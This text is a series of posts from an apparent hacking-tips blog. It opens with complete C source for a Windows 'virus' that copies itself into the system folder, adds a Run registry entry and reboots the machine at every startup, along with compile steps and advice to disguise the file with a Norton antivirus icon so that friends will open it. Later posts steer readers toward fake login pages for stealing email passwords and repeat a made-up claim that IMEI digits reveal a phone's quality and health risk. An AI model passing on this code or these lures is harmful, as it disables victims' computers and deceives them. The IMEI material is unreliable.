    8. You are done.The ICON get’s changed.

    Creating a Virus to restart the Computer at every Startup


    Today I will show you how to create a virus that restarts the computer upon every startup.That is, upon infection, the computer will get restarted every time the system is booted.This means that the computer will become inoperable since it reboots as soon as the desktop is loaded.


    For this, the virus need to be doubleclicked only once and from then onwards it will carry out rest of the operations.And one more thing,none of the antivirus softwares detect’s this as a virus.I have coded this virus in C.So if you are familiar with C language then it’s too easy to understand the logic behind the coding.


    Here is the source code.


    #include<stdio.h>

    #include<dos.h>

    #include<dir.h>


    int found,drive_no;char buff[128];


    void findroot()

    {

    int done;

    struct ffblk ffblk; //File block structure

    done=findfirst(”C:\\windows\\system”,&ffblk,FA_DIREC); //to determine the root drive

    if(done==0)

    {

    done=findfirst(”C:\\windows\\system\\sysres.exe”,&ffblk,0); //to determine whether the virus is already installed or not

    if(done==0)

    {

    found=1; //means that the system is already infected

    return;

    }

    drive_no=1;

    return;

    }

    done=findfirst(”D:\\windows\\system”,&ffblk,FA_DIREC);

    if(done==0)

    {

    done=findfirst(”D:\\windows\\system\\sysres.exe”,&ffblk,0);

    if

    (done==0)

    {

    found=1;return;

    }

    drive_no=2;

    return;

    }

    done=findfirst(”E:\\windows\\system”,&ffblk,FA_DIREC);

    if(done==0)

    {

    done=findfirst(”E:\\windows\\system\\sysres.exe”,&ffblk,0);

    if(done==0)

    {

    found=1;

    return;

    }

    drive_no=3;

    return;

    }

    done=findfirst(”F:\\windows\\system”,&ffblk,FA_DIREC);

    if(done==0)

    {

    done=findfirst(”F:\\windows\\system\\sysres.exe”,&ffblk,0);

    if(done==0)

    {

    found=1;

    return;

    }

    drive_no=4;

    return;

    }

    else

    exit(0);

    }


    void main()

    {

    FILE *self,*target;

    findroot();

    if(found==0) //if the system is not already infected

    {

    self=fopen(_argv[0],”rb”); //The virus file open’s itself

    switch(drive_no)

    {

    case 1:

    target=fopen(”C:\\windows\\system\\sysres.exe”,”wb”); //to place a copy of itself in a remote place

    system(”REG ADD HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\

    CurrentVersion\\Run \/v sres \/t REG_SZ \/d

    C:\\windows\\system\\ sysres.exe”); //put this file to registry for starup

    break;


    case 2:

    target=fopen(”D:\\windows\\system\\sysres.exe”,”wb”);

    system(”REG ADD HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\

    CurrentVersion\\Run \/v sres \/t REG_SZ \/d

    D:\\windows\\system\\sysres.exe”);

    break;


    case 3:

    target=fopen(”E:\\windows\\system\\sysres.exe”,”wb”);

    system(”REG ADD HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\

    CurrentVersion\\Run \/v sres \/t REG_SZ \/d

    E:\\windows\\system\\sysres.exe”);

    break;


    case 4:

    target=fopen(”F:\\windows\\system\\sysres.exe”,”wb”);

    system(”REG ADD HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\

    CurrentVersion\\Run \/v sres \/t REG_SZ \/d

    F:\\windows\\system\\sysres.exe”);

    break;


    default:

    exit(0);

    }


    while(fread(buff,1,1,self)>0)

    fwrite(buff,1,1,target);

    fcloseall();

    }


    else

    system(”shutdown -r -t 0″); //if the system is already infected then just give a command to restart

    }


    NOTE: COMMENTS ARE GIVEN IN GREEN COLOUR.


    Compiling The Scource Code Into Executable Virus.



    1. Download the source code here

    2. The downloaded file will be Sysres.C

    3. Compile it in any 32-Bit compiler (Borland C++ 5.5 or higher is recommended)

    4. The resulting .exe file is a virus and once you execute it will infect the system.


    Testing And Removing The Virus From Your PC



    You can compile and test this virus on your own PC without any fear.To test, just doubleclick the sysres.exe file and restart the system manually.Now onwards ,when every time the PC is booted and the desktop is loaded, your PC will restart automatically again and again.

    It will not do any harm apart from automatically restarting your system.After testing it, you can remove the virus by the following steps.


    1. Reboot your computer in the SAFE MODE

    2. Goto X:\Windows\System (X can be C,D,E or F)

    3.You will find a file by name sysres.exe, delete it.

    4.Type regedit in run.You will goto registry editor.Here navigate to


    HKEY_CURRENT_USER\Software\Microsoft\Windows\ CurrentVersion\Run 


     


    There, on the right site you will see an entry by name “sres“.Delete this entry.That’s it.You have removed this Virus successfully.


    Logic Behind The Working Of The Virus



    If I don’t explain the logic(Algorithm) behind the working of the virus,this post will be incomplete.So I’ll explain the logic in a simplified manner.Here I’ll not explain the technical details of the program.If you have further doubts please pass comments.


    LOGIC:

    1. First the virus will find the Root partition (Partition on which Windows is installed).

    2. Next it will determine whether the Virus file is already copied(Already infected) into X:\Windows\System

    3. If not it will just place a copy of itself into X:\Windows\System and makes a registry entry to put this virus file onto the startup.

    4. Or else if the virus is already found in the X:\Windows\System directory(folder), then it just gives a command to restart the computer.


    This process is repeated every time the PC is restarted.


    NOTE: The system will not be restarted as soon as you double click the Sysres.exe file.The restarting process will occur from the next boot of the system.


    AND ONE MORE THING BEFORE YOU LEAVE(This Step is optional)


    After you compile, the Sysres.exe file that you get will have a default icon.So if you send this file to your friends they may not click on it since it has a default ICON.So it is possible to change the ICON of this Sysres.exe file into any other ICON that is more trusted and looks attractive.


    For example you can change the .exe file’s icon into Norton antivirus ICON itself so that the people seeing this file beleives that it is Norton antivirus. Or you can change it’s ICON into the ICON of any popular and trusted programs so that people will definitely click on it.


    The detailed tutorial on changing the ICON is given in my post How To Change The ICON Of An EXE File .

    Chat without Yahoo Messenger or Gtalk ?

    Can we chat without Yahoo messenger? Most of us are familiar with the most widely used applications such as Yahoo messenger and Gtalk to carry out chatting with our friends.But here I’ll show how to chat without Yahoo messenger or Gtalk.As we all know the information we exchange with their servers(Yahoo or Gtalk) are recorded and stored along with the corresponding IP addresses.This may hurt our privacy since all the information we exchange while chatting has to pass through a third party server.



    Moreover if the matter is highly confidential, then it is necessary to have a totally private chat where the messages are exchanged only between the people involved in the chat and not with any other third party servers.At these situations, it is better to chat without Yahoo messenger.

    So, how to carry out a private chat without Yahoo messenger or Gtalk?

    For this purpose there exists many softwares that support’s you to host a web-based chat system without any additional software or services.So with these softwares the exchange of messages takes place directly between the two persons engaging in the chat and will not pass through any other third party server.This ensures 100% privacy and eliminates the desperate need to chat with Yahoo messenger.

    One of my favorite program for private chat is Easy Chat Server




    Easy Chat Server is a Windows program that allows you to host a web-based chat system without any additional software or services. Unlike other chat server, you do not need to install Java. It allows you to build one or more web-based chat rooms on your machine, and provides advanced chat functionalities aiming to offer discussion space for your users, customers and partners.

    Here are some of the screenshots of Easy Chat Server.



     



     


    Key Features of Easy Chat Server:


    • Easy to use, Simple installation that will have you up and running in minutes.

    • 128-Bit Security Socket Layer(SSL) support. support for server level certificate creation.

    • Instantly runs a complete chat server on your PCs - does not need to install any Web Server.

    • Supports full private messaging and One to One private chat.

    • Support of images, smileys, avatar icons.

    • Full chat and access logs are available within the chat server.

    • Have a built-in IP Filter, supports banning/unbanning IP address, securely.

    • Multiple styles available for the user to customize rooms.

    • Unlimited rooms and users, no any annual, per-user, or maintenance fees.

    • No spyware, adware or other unwanted extra programs.

    Email Hacking Software

    Email Hacking Software - Password Hacking Software - Yahoo Hacking Software - Hotmail Hacking Software

    Don’t get fooled by these words. Most of us are very curious about software that can hack emails.In fact most of the searches about hacking contain the keyword email hacking software.Yes most of the people think that it is possible to hack into Yahoo, Gmail or Hotmail using a software.But is it really possible to hack an email? Nothing is impossible! But this doesn’t mean that it is possible using a software.


    Now most of you might have got confused! These are some of the questions that may arise in your mind now.




    1. Is there any software that can hack an email account?



    THERE IS NO READYMADE SOFTWARE FOR HACKING AN EMAIL ACCOUNT.Yes this is true.If you come across any website selling a software with the label like “EMAIL HACKING SOFTWARE” then the site is totally a scam site.I bet, there exists no such program/software.You may search the entire web, but none of the software works.This may be disappointing most of you, but it is true.So, here onwards STOP searching for such software.Most of you may not beleive my words now.Read further and you’ll understand.


    Think logically! If there exists such software then what about Google,Yahoo and Hotmail.We all know that they are the top giants which are providing the email service to millions of people.They have invested billions of $$ on these projects and is one of the main source of income for them.If that can be hacked using a software? Don’t even imagine this.These giants have thousands of Network Security Specialists who work 24/7 to combat exploits.Even if there exists any such vulnerability (Bug) they are patched in quick time before they are exploited by hackers.


    Suppose assume that a hacker has developed a software and has somehow succeeded to hack into an account.He can use this software to hack the accounts of some big company/merchants and make billions of dollars overnight. With this being the case why should he sell this software on the internet for some cheap money? Inturn he can keep this software as a secret and continue with his work.Now think,does it make sense in selling this software for money? Absolutely NOT.


    So the bottomline is never beleive the sites which claims to offer a software to hack an email.These sites are 100% scam.


    They just want to trap some innocent people who beleive this.I can give you many examples where people are fooled by these kind of sites.I’ll not disclose the names of these sites for obvious reasons.But one thing I’ll tell you.If a site claims to sell an such software or asks you to pay before they send you the password then that site is really stupid and nonsense.Even if such software exists it will never be available for sale.So don’t get fooled by these sites.There exist’s no Software for email hacking.


     

    2. Are there any real hackers who can hack the password?


    There may be! Who know’s.But don’t think that hacking an email is so easy.It is almost impossible to hack Yahoo,Gmail or Hotmail.So even if there exists such a hacker the chances of you getting his contact is very rare.



    3. There are many sites on the internet which claim to hack any password for money.Are they legitimate? Will they really hack password?


    Most of the sites which claim to hack an email are not genuine.They just cheat innocent people to sniff money.There are many sites which claim to show some proofs such as screenshot of the inbox before you can make a payment.I have tried few such sites but none of them responded or showed me such proofs.But it’s not a loss to try such sites unless you don’t pay them until they show you the proofs.But never pay before they show the proofs.


    4. Finally are there any other ways to hack an email password?


    One good news for all of you.It is still possible to hack an email account and get the password.These are some of the working methods that you can try to hack an email password.It is disscussed in the post Hacking An Email Account and Hacking Yahoo, Gmail or any other Password which covers the real ways of professional hacking using Fake Login Pages.

    Gmail Hacking Tool - A New Way to Hack Gmail


    A new Gmail hacking tool that is capable of automatically stealing the Gmail IDs of non-encrypted sessions and breaking into Gmail accounts has been presented at the Defcon hackers’ conference in Las Vegas.


    Last week Google introduced a new feature in Gmail that allows users to permanently switch on SSL and use it for every action involving Gmail, and not only, authentication. Users who did not turn it on now have a serious reason to do so as Mike Perry, the reverse engineer from San Francisco who developed this Gmail hacking tool is planning to release the tool in two weeks.


    When you log in to Gmail account the website sends a cookie (a text file) containing your session ID to the browser. This file makes it possible for the website to know that you are authenticated and keep you logged in for two weeks, unless you manually click the sign out button. When you click sign out this cookie is cleared.Even though when you log in, Gmail forces the authentication over SSL (Secure Socket Layer), you are not secure because it reverts back to a regular unencrypted connection after the authentication is done.


    According to Google this behavior was chosen because of low-bandwidth users, as SLL connections requires high bandwidth.The problem lies with the fact that every time you access anything on Gmail, even an image, your browser also sends your cookie to the website. This makes it possible for a hacker to sniff the traffic on the network to insert an image served from http://mail.google.com and force your browser to send the cookie file, thus getting your session ID. The new Gmail hacking tool is capable of doing this.Once this happens the hacker can log into the account without the need of a password. People checking their e-mail from public wireless hotspots are more likely to get hacked than the ones using secure wired networks.


    Perry mentioned that he notified Google about this situation over a year ago and even though eventually it made this option available, he is not happy with the lack of information. “Google did not explain why using this new feature was so important” he said. He continued and explained the implications of not informing the users, “This gives people who routinely log in to Gmail beginning with an https:// session a false sense of security, because they think they’re secure but they’re really not.


    “If you are logging in to your Gmail account from different locations and you would like to benefit from this option only when you are using unsecured networks, you can force it by manually typing https://mail.google.com before you log in. This will access the SSL version of Gmail and it will be persistent over your entire session and not only during authentication.

    How to Copy Locked Photos from Orkut ?


    Recently Orkut updated it’s security feature and disabled Right-click on photos of friend’s album.So this makes it difficult to copy photos from Orkut.It’s a new security update made by Orkut to prevent people from copying photos from Orkut and misusing it.This may be annoying most of you! Then…


    How To Copy Locked Photos From Orkut?



    Yes it’s still possible to copy the photos from Orkut.Here’s a step-by-step procedure to copy the photo.


    1. Login into your Orkut Account.


    2. Goto your friend’s album and open the photo that you need to copy.


    3. Once the photo is loaded to it’s full size just place the mouse cursor on the photo.


    4. Press the left click button and drag and drop the photo onto the ADDRESS BAR.I think this trick is no longer working.So I have a new trick….


    Just DRAG and DROP the PHOTO onto the current/new TAB (If you have IE 7). That’s it . This trick is working now!!



    4. Now the photo gets displayed seperately on your browser.


    5. You can Right-Click and select the Save As option to save the photo onto your PC.


    The browser also displays the direct link to the photo.This link can be used to share the Orkut photos with your friends without the need to login to your Orkut account to access photos.


    Please express your opinions through comments.Cheer Up..


    Happy Orkut Hacking.

    How to Enable Telnet Command in Vista ?


    Most of you are familiar with the telnet command.It is one of the well known Windows IP Utilities .In fact the telnet command is most important for sending a fake email which i have discussed in my previous post.If you are using Windows XP the telnet command is available by default.But if you use Windows Vista the telnet command is disabled by default.


    So when you try to use the telnet command in Windows Vista you get the following error message.


    ‘telnet’ is not recognized as an internal or external command,operable program or batch file.



    You get this error in Vista because unlike XP ,Vista does not support telnet command by default.So, for this you have to manually enable/turn on the telnet feature in Vista.


    Here’s the step by step procedure to enable telnet feature (telnet command) in Windows Vista.


    1. Goto the Control Panel.


    2. Click on the sub heading Uninstall a program under the main heading Programs.


    NOTE: IF you are in the Classic View click on Programs and Features.


    3. Now in the left panel under the Tasks select the option Turn Windows features on or off.



    4. Now a new window opens.In the new window select the following


    Telnet Client

    Telnet Server (optional)


    5. After selecting click on OK.


    Now wait for few minutes till the telnet feature is installed.Once the telnet feature is installed you can goto the command prompt and use the telnet command.System restart is not required.

    Hide IP Address - Real ways to hide your IP


    Here in this post I will try to give you every possible information to hide the IP address.If you seriously want to hide your IP address then this post is for you!


    One of the most frequently asked questions by the internet users is How To Hide IP Address ?. Many times it becomes necessary to hide the real IP address for the sake of privacy.For this, I have tried many softwares, proxy servers and many such tools that guaranteed to hide my IP address.But still none of them worked for me. I think most of you have the same experience.Are you fed up with these dummy softwares that fails to hide the real IP address? Then is there any working way to hide the IP address?



    YES, you can definitely hide your IP .


    Now I’ll come to the heart of the post, which contains the answer to your curious question How to Hide the IP address ? The only solution to hide your IP address is by using a Proxy Server.But Wait! The story doesn’t end here.Even though proxy servers are the only way to hide your IP address, there are several ways of connecting your PC to the proxy server.Before setting up the connection with the proxy servers you must know some information about different types of proxy servers and their uses.


    1. Transparent Proxy Server

    This type of proxy server identifies itself as a proxy server and also makes the original IP address available through the http headers. These are generally used to speedup the web browsing since thay have a very good ability to cache websites.But they do not conceal the IP of it’s users. It is widely known as transparent proxy because it will expose your real IP address to the web.This type of proxy server does not hide your IP address.


    2. Anonymous Proxy Server

    This type of proxy server identifies itself as a proxy server, but does not make the original IP address available. This type of proxy server is detectable, but provides reasonable anonymity for most users. This type of proxy server will hide your IP address.


    3. Distorting Proxy Server

    This type of proxy server identifies itself as a proxy server, but make an incorrect original IP address available through the http headers. This type of proxy server will hide your IP address.


    4. High Anonymity Proxy Server ( Elite Proxy)

    This type of proxy server does not identify itself as a proxy server and does not make available the original IP address. This type of proxy server will hide your IP address.So this is the best way to mask your IP.


    Which Proxy Server is the best to Hide My IP ?


    I know, you can answer this question better than me.Obviously High Anonymity Proxy or Elite Proxy is the best to hide your IP.But it’s not easy to get a list of working elite proxies.If you search the Google, you will definitely get tons of proxy list.You’ll get a list of proxies in the following format


    IP:Port Number

    Eg: 221.90.45.67:8080 (221.90.45.67 is the IP of the proxy server and 8080 is the port number)

    But most of them don’t work.Here are some of the problems/risks associated with using free proxies that are available on the internet.



    • Most of them do not work since the proxy servers frequently changes it’s IP/Port number.

    • Even if you find a working proxy server it may be too slow.

    • Your privacy is not guaranteed since all your traffic is routed through the proxy server.

    • The administrators of the proxy servers may steal your valuable information such as passwords,SSN (Social security number),Credit Card details etc.


    So with all these being the risks then how to find a Working,fast,Highly Anonymous and secured Proxy servers?


    Now I will give a list of softwares that will really hide your IP address.I have tried many such softwares and have found only few of them working perfectly.Here is a list of working IP Hiding softwares that you can try.I have listed them in the order of their popularity


    1. Hide The IP


    Let’s you choose the country,Type and speed of the proxy.Not so popular but personally I recommend this to the users.


    2. Hide My IP


    3. Hide IP NG


    You can get more informations about these products on their respective homepages.


    How to ensure that the IP is hidden ?


    Before you hide your IP you can check your real IP by visiting the following site.


    WhatIsMyIPAddress.Com


    Once you get your real IP, switch on your IP hiding software.Now once again visit the above site and check your IP address.If you see a new IP then this means that your software is doing the right job.Also the above site(Whatismyipaddress.com) is capable of detecting many proxies.If you see the words such as “Suspected proxy server or network sharing device” or similar words then it means that the proxy you are using is not an Elite Proxy.


    One Final Word before you leave! Even though Elite proxies are almost undetectable this doesn’t mean that you can escape from online crimes by hiding your IP.There are many proxy detecting services available which detect almost any proxy.So if you involve in any cyber crimes then you will definitely be behind the bars.Using proxy will not help you in this case.


    One More thing, It is unsafe to use proxy during e-commerce transactions such as Online banking,Online Credit Card payment etc.So please avoid proxies during these circumstances.

    How to Hack an Email using Hardware Keylogger ?

    Top Reasons why you shouldn’t buy an iphone

    Are you planning to buy an iphone ? If so then this post is a must read for you.The much hyped iPhone 3G was launched in India a few weeks back and we have seen many issues and open security flaws in the new iPhone.Here I have some of the top reasons for which you shouldn’t buy an iphone.



     



    • The worst thing is that you cannot forward a SMS message!! Don’t think that I am foolish, but really your iPhone 3G can’t forward a simple SMS. You’ll have to retype the SMS and forward it.

    • There is NO copy / paste functionality. So you need to remember the texts and type again as you go.

    • Bluetooth functionality is only limited to headset use. You can’t do any file transfer over Bluetooth.So if you are planning to share your songs or photos with your friends then forget about it!

    • Absolutely no camera settings - it’s just like some ancient digital camera which does only point and shoot functionality.No Flash,No Zoom functionality.

    • Photos taken in a VGA camera is better than that of iphone!

    • The iPhone 3G is simply overpriced in India (Costs almost twice the price as in US)

    • It’s in built Safari web browser does not support Flash as well as Java.

    • There is No office document editor. Most Nokia’s come with inbuilt editor’s for Word / Excel.

    • The iPhone doesn’t has AD2P on the Bluetooth - which means you can’t get stereo sound via Blue Tooth headphones, that’s a big disappointment for the music fans.

    • The iPhone doesn’t has a Removable battery. Yes - you cannot change the battery yourself. Apple expects you to send the phone to an Apple Outlet to replace the battery. Now if you travel too much - what are you gonna do? Look for an Apple Store to interchange the travel battery?

    • iPhone doesn’t has an option to send MMS. Forget about MMS.

    • Though you can’t sent MMS - You can’t receive MMS messages too!

    • You can’t set your personal songs as ring tones!

    • The iPhone’s screen is not Finger Print Resistant. Since the iPhone is a touch screen phone so it is bound to get your finger print’s each time you touch so it gets dirty very easily.

    • THE BIGGEST ONE - ONCE YOU ARE ON 3G NETWORK(Which I suppose will happen in a year in India), YOU CANNOT MAKE CALLS TO A PHONE ON 2G NETWORK. SO IF YOU WANT TO CALL A PERSON WHO IS NOT HAVING A 3G PHONE. SORRY, YOU’LL HAVE TO FIND A PCO and a 1RUPEE!!!


    These are some of the top reasons that shows iphone’s incapability.But there are many more such reasons for you to stop buying an iphone.If you still want to buy the iphone then definitely you must be crazy?!

    Is your Nokia Cell Phone Original ?


    Nokia is one of the largest selling phones across the globe.Most of us own a Nokia phone but are unaware of it’s originality.Are you keen to know whether your Nokia mobile phone is original or not? Then you are in the right place and this information is specially meant for you. Your phones IMEI (International Mobile Equipment Identity) number confirms your phone’s originality.


    Press the following on your mobile *#06# to see your Phone’s IMEI number(serial number).


    Then check the 7th and 8th numbers


    Phone serial no. x x x x x x ? ? x x x x x x x



    IF the Seventh & Eighth digits of your cell phone are 02 or 20 this means your cell phone was assembled in Emirates which is very Bad quality


    IF the Seventh & Eighth digits of your cell phone are 08 or 80 this means your cell phone was manufactured in Germany which is fair quality


    IF the Seventh & Eighth digits of your cell phone are 01 or 10 this means your cell phone was manufactured in Finland which is very Good


    IF the Seventh & Eighth digits of your cell phone are 00 this means your cell phone was manufactured in original factory which is the best Mobile Quality


    IF the Seventh & Eighth digits of your cell phone are 13 this means your cell phone was assembled in Azerbaijan which is very Bad quality and also dangerous for your health.